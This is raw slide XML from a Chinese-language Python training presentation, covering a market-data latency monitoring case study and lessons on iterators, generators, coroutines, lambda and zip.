              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MDUSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>读取共享目录中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mktdtxx.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>源文件提供行情服务。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n-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>20170106_0.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MDUSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>模块日志，关注最后一列采集行情平均延时，出现问题时延时会不断增大。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  <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如果有很多套</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CMDS,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如何及时发现那套出问题</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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9480" y="159484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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>监控上海行情延时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5" y="1639274"/>
            <a:ext cx="8603372" cy="30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080" y="601178"/>
            <a:ext cx="3583533" cy="3744416"/>
          </a:xfr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20170106_0.log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中最新的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Cost Max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记录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中的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延时写入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PyRes.log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中。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下用命令行执行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python pyShlogMonitorDemo.py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将文件打包成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pyinstaller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-C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或 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-C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py2exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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模块</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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pyinstaller.exe –F \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D:\Python27\mypy27wk\pyShLogMonitorDemo.py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29832" y="173196"/>
            <a:ext cx="37819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/>
              <a:t>案例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>监控上海行情延时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5" y="573306"/>
            <a:ext cx="4934100" cy="41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3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牛皮纸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3812" r="3680" b="4240"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1293168" y="987574"/>
            <a:ext cx="4176464" cy="25518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87888" y="177550"/>
            <a:ext cx="3205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迭代器、生成器、特殊关键字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41240" y="1347614"/>
            <a:ext cx="288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迭代器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生成器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表达式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特殊关键字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7607" r="3129" b="13261"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4821560" y="1319755"/>
            <a:ext cx="2661708" cy="24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8344" y="4835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983" y="699542"/>
            <a:ext cx="363349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2E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迭代器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E2E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(Iterator)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2E2E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/>
              <a:t>迭代器对象要求支持迭代器协议的对象，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>中，支持迭代器协议就是实现对象的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
              </a:rPr>
              <a:t>__()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
              </a:rPr>
              <a:t>next()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>方法。其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>iter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>__()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>方法返回迭代器对象本身；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>next()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>方法返回容器的下一个元素，在结尾时引发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
              </a:rPr>
              <a:t>StopIteration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>异常</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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213965" y="2714545"/>
            <a:ext cx="35245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2E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生成器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E2E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(Generators)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2E2E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1600" dirty="0"/>
              <a:t>生成器同样是可迭代对象，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>在需要的时候才产生结果，不是立即产生结果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>，因为它并没有把所有值存放内存中，它动态的生成值。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A8C127A-C6D3-446C-9262-3E579CBFA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616207"/>
            <a:ext cx="4032448" cy="4025415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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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zh-CN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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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#G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&lt;generator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zh-CN" altLang="en-US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0x1022ef630</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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print(next(L),end=' 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print(next(L))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print(type(L),end=' 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print(type(G))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next(G)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next(G)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n in G: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200" dirty="0" err="1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n,end</a:t>
            </a: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 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#print(next(G))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输出：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="99007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&lt;class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1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list_iterator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200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 &lt;class 'generator'&gt;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sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="99007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altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="99007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迭代器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29454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生成器和迭代器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FD39326-C5D9-485E-8486-75ECB8C5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03" y="595916"/>
            <a:ext cx="8476060" cy="3840749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Python的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-C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zh-CN" sz="1600" dirty="0"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循环本质上就是通过不断调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-C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next()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"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函数实现的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"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生成器并没有将所有值放入内存中，而是实时地生成这些值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66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]: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首先获得Iterator对象:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="9999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iter([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next(it)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#获得下一个值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zh-CN" sz="160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#遇到StopIteration就退出循环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6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zh-CN" altLang="zh-CN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6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6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2A80DC-E170-4510-82E1-3D515C421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814" y="1476242"/>
            <a:ext cx="4002549" cy="249299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迭代器协议：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对象需要提供</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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next()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方法，它要么返回迭代中的下一项，要么就引起一个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异常，以终止迭代。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="66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400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="66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可迭代对象</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1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实现迭代器协议对象。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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4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都是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（可迭代对象），但不是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（迭代器对象）。但可以使用内建函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="14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，把这些都变成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="14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zh-CN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（迭代器对象）。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5643" y="4823048"/>
            <a:ext cx="380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59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特殊关键字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559594"/>
            <a:ext cx="87849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跟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位置一样，只不过每次返回结果后并没有退出，而是等待下一次迭代，下一次迭代从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后语句开始执行，直到再次遇到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，返回新一次结果。带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的函数被称之为 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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（生成器）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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可以迭代，可简化运算模型。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cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"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1005870"/>
            <a:ext cx="7869619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方法 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启动生成器，从生成器函数第一行代码开始执行，直到第一次执行完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语句跳出生成器函数。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方法 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该参数指定的是上一次被挂起的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语句的返回值。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79549" y="1742392"/>
            <a:ext cx="1872208" cy="2923877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gen():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'hehe..'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yield 1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'haha..'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yield 2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'hoho..'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g=gen()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g.next()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g.send(None)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g.next()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/>
              <a:t>结果：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    hehe..</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    haha..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    hoho.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>.     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1"/>
              <a:t>StopIteration</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4301443" y="1755766"/>
            <a:ext cx="1872208" cy="2923877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gen():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hehe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a=yield 1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haha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b=yield a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hoho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g=gen()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g.next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g.send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a, b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>结果：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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 err="1"/>
              <a:t>hehe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1"/>
              <a:t>haha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>    1 3</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2284027" y="1742392"/>
            <a:ext cx="1872208" cy="2923877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gen():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hehe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yield 1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haha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yield 2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hoho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..'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g=gen()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g.next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g.send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(None)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a, b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/>
              <a:t>结果：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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 err="1"/>
              <a:t>hehe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1"/>
              <a:t>haha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>    1 2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6307399" y="1757993"/>
            <a:ext cx="2520280" cy="2554545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def zhanlang():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u'一朝是战狼, ',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sz="1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yield 7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m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d = yield 1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u'中国军人威武霸气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zl = zhanlang()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 = zl.next()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 = zl.send(u'终生是是战狼!')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print u'致敬建军节：', m, '.', d</a:t>
            </a:r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结果：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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一朝是战狼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终生是是战狼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致敬建军节： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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7 . 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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65159" y="930276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数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1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处理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="椭圆 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1442527" y="2729995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网络</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1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爬虫</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="椭圆 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5508104" y="563975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自动化运维</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="椭圆 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2857995" y="3415795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量化</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1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交易</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="13 CuadroTexto"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7699251" y="482304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s-ES" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="04AED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083580" y="133170"/>
            <a:ext cx="1390556" cy="38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+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>交流概要</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="+mn-ea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25853" y="2044195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机器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1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 algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" alt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学习</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="椭圆 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5436096" y="3415795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黑客</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1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 algn="ctr"/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应用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="椭圆 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3561170" y="627534"/>
            <a:ext cx="1162632" cy="1162632"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="04AE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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="16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架构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 5" descr="8XOO4WRIXV2176WUCX884{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170" y="2044195"/>
            <a:ext cx="135096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>
            <a:stCxn id="7" idx="5"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2457527" y="1922644"/>
            <a:ext cx="1103643" cy="43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605159" y="2931790"/>
            <a:ext cx="1102745" cy="229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7"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3850363" y="3161766"/>
            <a:ext cx="170264" cy="42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6" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4932040" y="3161766"/>
            <a:ext cx="674320" cy="42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4"/>
            <a:endCxn id="18" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4142486" y="1790166"/>
            <a:ext cx="94166" cy="2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572000" y="1511592"/>
            <a:ext cx="1034360" cy="84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18" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4912133" y="2678924"/>
            <a:ext cx="915312" cy="5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4" y="32903"/>
            <a:ext cx="730728" cy="5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8344" y="48230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特殊关键字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0032" y="1400619"/>
            <a:ext cx="4162362" cy="1754326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n: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"not n..."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[CONSUMER]Consuming %s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%n)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 OK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761" y="1308286"/>
            <a:ext cx="4918620" cy="1938992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produce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(c):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= c.send(None)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[PRODUCER]Consumer first return: %s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%f)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0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&lt; 2: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n + 1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[PRODUCER]Producing %s.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%n)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c.send(n)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[PRODUCER]Consumer return: %s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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%r)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c.close() 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3552581"/>
            <a:ext cx="2232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调用：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zh-CN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produce(c)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/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7944" y="3429471"/>
            <a:ext cx="29523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first </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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Producing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1..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[CONSUMER]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Consuming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1..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200 OK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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN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Producing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2..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[CONSUMER]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Consuming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2.. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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[PRODUCER]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1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200 OK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1000" dirty="0">
              <a:latin typeface="Arial" panose="020B060402020202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635896" y="3923475"/>
            <a:ext cx="288032" cy="18154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028" y="592308"/>
            <a:ext cx="87134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生产者消费者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>协程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模型：生产消息后，直接通过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跳转到消费者开始执行，待消费者执行完毕后，切换回生产者继续生产。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7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42944" y="4835748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匿名函数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表达式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90438" y="607542"/>
            <a:ext cx="8602042" cy="40524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从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Lisp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语言借用来的，只是一种风格，可用函数替换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类似于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语言的宏。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 [arg1 [, agr2,…..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]] : expression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...    return x*2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6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 = lambda x: x*2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g(3)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(lambda x: x*2)(3) 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>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN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对下列数组进行排序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先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再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，类似于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zh-CN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中的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altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Gungsuh" pitchFamily="18" charset="-127"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>list1=[ {'x':1,'y':100},{'x':30,'y':50},{'x':0,'y':0},\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Gungsuh" pitchFamily="18" charset="-127"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        {'x':60,'y':90},{'x':30,'y':28} ]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Gungsuh" pitchFamily="18" charset="-127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sorted(list1, lambda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a,b:cmp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((a['x'],a['y']),(b['x'],b['y'])))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851920" y="1275606"/>
            <a:ext cx="4896544" cy="2088232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 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与 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区别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创建的方法是有名称的，而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没有。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会返回一个函数对象，但这个对象不会赋给一个标识符，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则会把函数对象赋值给一个变量（函数名）。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只是一个表达式，而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则是一个语句。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表达式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":"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后面，只能有一个表达式，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则可以有多个。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）像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或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或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等语句不能用于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中，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可以。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6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一般用来定义简单的函数，而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可以定义复杂的函数。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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7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）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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lambda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函数不能共享给别的程序调用，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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lang="zh-CN" alt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可以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392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544" y="1897692"/>
            <a:ext cx="5544616" cy="2646878"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175">
            <a:noFill/>
            <a:prstDash val="dashDot"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示例：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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[1, 2, 3]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[4, 5, 6]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['a', 'b', 'c']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 = zip(x, y, z)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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xyz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-C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运行结果：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[(1, 4, 'a'), (2, 5, 'b'), (3, 6, 'c')]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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668344" y="4835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特殊关键字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zip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fitler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290438" y="576173"/>
            <a:ext cx="8363818" cy="127549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600" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Zip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数接受任意多个（包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>个和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>个）序列作为参数，返回一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
